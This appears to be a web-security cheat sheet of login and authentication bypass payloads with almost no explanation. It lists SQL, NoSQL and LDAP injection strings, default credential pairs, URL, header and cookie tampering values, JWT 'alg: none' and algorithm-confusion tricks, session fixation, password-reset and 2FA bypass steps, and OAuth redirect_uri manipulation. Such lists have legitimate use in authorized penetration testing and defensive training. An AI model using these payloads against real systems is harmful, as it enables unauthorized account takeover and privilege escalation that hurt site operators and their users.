Login bypass and authentication flaw exploitation
Bypass authentication via SQL injection
admin' OR '1'='1
admin' OR 1=1--
' OR 1=1--
admin'--
admin' #
' OR 'x'='x
Bypass MongoDB authentication
MongoDB{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$gt": ""}, "password": {"$gt": ""}}
username[$ne]=admin&password[$ne]=pass
Bypass LDAP authentication
LDAP*
admin)(&)
*)(uid=*))(|(uid=*
Common default username/password combinations
admin:admin
admin:password
administrator:administrator
root:root
root:toor
admin:12345
Modify URL parameters to bypass authorization checks
?admin=true
?role=admin
?authenticated=1
?isAdmin=true
?user=admin
Bypass authentication via header injection
X-Original-URL: /admin
X-Rewrite-URL: /admin
X-Forwarded-For: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Originating-IP: 127.0.0.1
Modify cookie values for privilege escalation
admin=true
isAdmin=1
role=admin
authenticated=yes
Exploit JWT token vulnerabilities
JWTChange "alg" to "none"
Change "role": "user" to "role": "admin"
RS256 to HS256 algorithm confusion
Test with tools: jwt.io, jwt_tool
Force user to use known session ID
Set session ID before login: ?PHPSESSID=attacker_session
Session ID doesn't change after login
Exploit weak password reset mechanisms
Try sequential tokens: token=1, token=2, etc.
Manipulate email parameter: email=victim@test.com
Reuse old tokens
Race condition: request multiple tokens
Techniques to bypass two-factor authentication
Remove 2FA parameter from request
Try direct access to /dashboard after login
Manipulate response: change "2fa_required": true to false
Reuse old 2FA codes
Exploit OAuth implementation flaws
Change redirect_uri to attacker domain
CSRF in OAuth flow
Open redirect in redirect_uri